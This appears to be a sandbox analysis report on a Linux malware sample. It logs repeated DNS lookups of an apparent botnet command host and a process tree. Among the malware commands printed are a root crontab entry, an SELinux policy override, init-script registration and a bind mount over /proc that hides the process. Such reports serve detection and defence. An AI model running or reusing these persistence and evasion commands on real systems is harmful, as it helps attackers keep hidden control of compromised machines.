Jul 2, 2024 18:17:17.690737009 CEST	8.8.8.8	192.168.2.14	0xa54f	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:19.336252928 CEST	8.8.8.8	192.168.2.14	0xf3da	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:20.992747068 CEST	8.8.8.8	192.168.2.14	0xae4b	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:22.628916025 CEST	8.8.8.8	192.168.2.14	0x33d3	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:24.247776031 CEST	8.8.8.8	192.168.2.14	0x959c	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:25.868735075 CEST	8.8.8.8	192.168.2.14	0x729b	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:27.500977039 CEST	8.8.8.8	192.168.2.14	0x5ee9	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:29.120754004 CEST	8.8.8.8	192.168.2.14	0xb9a	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:30.735800982 CEST	8.8.8.8	192.168.2.14	0x1ae	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:32.402626038 CEST	8.8.8.8	192.168.2.14	0xb152	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:34.110115051 CEST	8.8.8.8	192.168.2.14	0x47fb	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:35.812756062 CEST	8.8.8.8	192.168.2.14	0x60e3	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:37.436606884 CEST	8.8.8.8	192.168.2.14	0x815a	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:39.065119028 CEST	8.8.8.8	192.168.2.14	0xf856	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:40.683464050 CEST	8.8.8.8	192.168.2.14	0x9fde	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:42.293342113 CEST	8.8.8.8	192.168.2.14	0x45b9	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:44.587726116 CEST	8.8.8.8	192.168.2.14	0x93	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:46.243077993 CEST	8.8.8.8	192.168.2.14	0xc5c1	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:47.872102976 CEST	8.8.8.8	192.168.2.14	0x1b1	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:49.547322035 CEST	8.8.8.8	192.168.2.14	0x77e9	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:51.166146040 CEST	8.8.8.8	192.168.2.14	0x309c	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:52.773650885 CEST	8.8.8.8	192.168.2.14	0x336b	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:54.413983107 CEST	8.8.8.8	192.168.2.14	0xa474	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:56.029509068 CEST	8.8.8.8	192.168.2.14	0x7a03	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:57.662435055 CEST	8.8.8.8	192.168.2.14	0x5d2e	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:59.307739019 CEST	8.8.8.8	192.168.2.14	0xe9c9	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:00.937382936 CEST	8.8.8.8	192.168.2.14	0x982b	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:02.591845989 CEST	8.8.8.8	192.168.2.14	0xb0f0	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:04.212112904 CEST	8.8.8.8	192.168.2.14	0x18ce	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:05.840415955 CEST	8.8.8.8	192.168.2.14	0x3b06	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:07.465497971 CEST	8.8.8.8	192.168.2.14	0xd0f5	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:09.087939024 CEST	8.8.8.8	192.168.2.14	0x21b1	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:10.713247061 CEST	8.8.8.8	192.168.2.14	0x7d2b	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:12.581387043 CEST	8.8.8.8	192.168.2.14	0x2ef5	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:14.198544979 CEST	8.8.8.8	192.168.2.14	0xa13	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:15.802033901 CEST	8.8.8.8	192.168.2.14	0x1dfe	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:17.441004038 CEST	8.8.8.8	192.168.2.14	0x27a3	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:19.118870974 CEST	8.8.8.8	192.168.2.14	0x46bd	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:20.748017073 CEST	8.8.8.8	192.168.2.14	0xb00	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:22.356904030 CEST	8.8.8.8	192.168.2.14	0xe18a	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:23.978521109 CEST	8.8.8.8	192.168.2.14	0xdb7e	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:25.590832949 CEST	8.8.8.8	192.168.2.14	0xcd0d	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:27.508773088 CEST	8.8.8.8	192.168.2.14	0x99f5	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:29.138283014 CEST	8.8.8.8	192.168.2.14	0xaf5c	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:30.780316114 CEST	8.8.8.8	192.168.2.14	0xae10	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:32.416179895 CEST	8.8.8.8	192.168.2.14	0x647e	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:34.026371002 CEST	8.8.8.8	192.168.2.14	0x100d	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:35.633764982 CEST	8.8.8.8	192.168.2.14	0x8f30	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:37.271111012 CEST	8.8.8.8	192.168.2.14	0xf4d6	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:38.906589985 CEST	8.8.8.8	192.168.2.14	0xf9a9	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:40.573052883 CEST	8.8.8.8	192.168.2.14	0x2ed5	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:42.197849035 CEST	8.8.8.8	192.168.2.14	0x754a	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:43.813837051 CEST	8.8.8.8	192.168.2.14	0xea2a	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:45.494303942 CEST	8.8.8.8	192.168.2.14	0x70fc	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:47.125104904 CEST	8.8.8.8	192.168.2.14	0x7a44	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:48.750658989 CEST	8.8.8.8	192.168.2.14	0x72cf	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:50.373543978 CEST	8.8.8.8	192.168.2.14	0xe5c3	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:52.062364101 CEST	8.8.8.8	192.168.2.14	0x4e53	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:53.703392029 CEST	8.8.8.8	192.168.2.14	0x28aa	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:55.327637911 CEST	8.8.8.8	192.168.2.14	0x8d5d	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:57.647264957 CEST	8.8.8.8	192.168.2.14	0x69d4	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:59.425518990 CEST	8.8.8.8	192.168.2.14	0xc9b	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: 0S3wxWer8x.elf PID: 5491, Parent PID: 5414

General

Start time (UTC):	16:16:55
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	/tmp/0S3wxWer8x.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5496, Parent PID: 5491

General

Start time (UTC):	16:16:55
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5496, Parent PID: 5491

General

Start time (UTC):	16:16:55
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	/tmp/0S3wxWer8x.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5502, Parent PID: 5496

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: bash PID: 5502, Parent PID: 5496

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5506, Parent PID: 5502

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5506, Parent PID: 5502

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5512, Parent PID: 5502

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5512, Parent PID: 5502

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5516, Parent PID: 5502

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5516, Parent PID: 5502

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5517, Parent PID: 5502

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: journalctl PID: 5517, Parent PID: 5502

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/usr/bin/journalctl
Arguments:	journalctl -xe --no-pager
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5518, Parent PID: 5496

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: bash PID: 5518, Parent PID: 5496

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5522, Parent PID: 5518

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5523, Parent PID: 5518

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5525, Parent PID: 5518

General

Start time (UTC):	16:16:58
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5528, Parent PID: 5496

General

Start time (UTC):	16:17:02
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: bash PID: 5528, Parent PID: 5496

General

Start time (UTC):	16:17:02
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5534, Parent PID: 5496

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: update-rc.d PID: 5534, Parent PID: 5496

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/usr/sbin/update-rc.d
Arguments:	update-rc.d dns-udp4 defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 5539, Parent PID: 5534

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/usr/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 5539, Parent PID: 5534

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5543, Parent PID: 5496

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: mount PID: 5543, Parent PID: 5496

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/usr/bin/mount
Arguments:	mount -o bind /tmp/ /proc/5496
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5569, Parent PID: 5496

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: service PID: 5569, Parent PID: 5496

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	service cron start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5574, Parent PID: 5569

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5574, Parent PID: 5569

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5575, Parent PID: 5569

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5575, Parent PID: 5569

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5576, Parent PID: 5569

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5576, Parent PID: 5569

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5579, Parent PID: 5569

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5580, Parent PID: 5579

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5580, Parent PID: 5579

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5581, Parent PID: 5579

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5581, Parent PID: 5579

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5569, Parent PID: 5496

General

Start time (UTC):	16:17:07
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start cron.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: 0S3wxWer8x.elf PID: 5604, Parent PID: 5496

General

Start time (UTC):	16:17:07
Start date (UTC):	02/07/2024
Path:	/tmp/0S3wxWer8x.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: systemctl PID: 5604, Parent PID: 5496

General

Start time (UTC):	16:17:07
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5510, Parent PID: 5509

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5510, Parent PID: 5509

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5514, Parent PID: 5513

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5514, Parent PID: 5513

General

Start time (UTC):	16:16:57
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5541, Parent PID: 5540

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5541, Parent PID: 5540

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: udisksd PID: 5558, Parent PID: 803

General

Start time (UTC):	16:17:04
Start date (UTC):	02/07/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 5558, Parent PID: 803

General

Start time (UTC):	16:17:05
Start date (UTC):	02/07/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 5594, Parent PID: 1

General

Start time (UTC):	16:17:07
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5594, Parent PID: 1

General

Start time (UTC):	16:17:07
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5656, Parent PID: 5594

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5665, Parent PID: 5656

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5665, Parent PID: 5656

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5666, Parent PID: 5665

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5666, Parent PID: 5665

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5667, Parent PID: 5666

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5667, Parent PID: 5666

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5672, Parent PID: 5667

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5672, Parent PID: 5667

General

Start time (UTC):	16:18:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: systemd PID: 5685, Parent PID: 1

General

Start time (UTC):	16:18:02
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5685, Parent PID: 1

General

Start time (UTC):	16:18:02
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

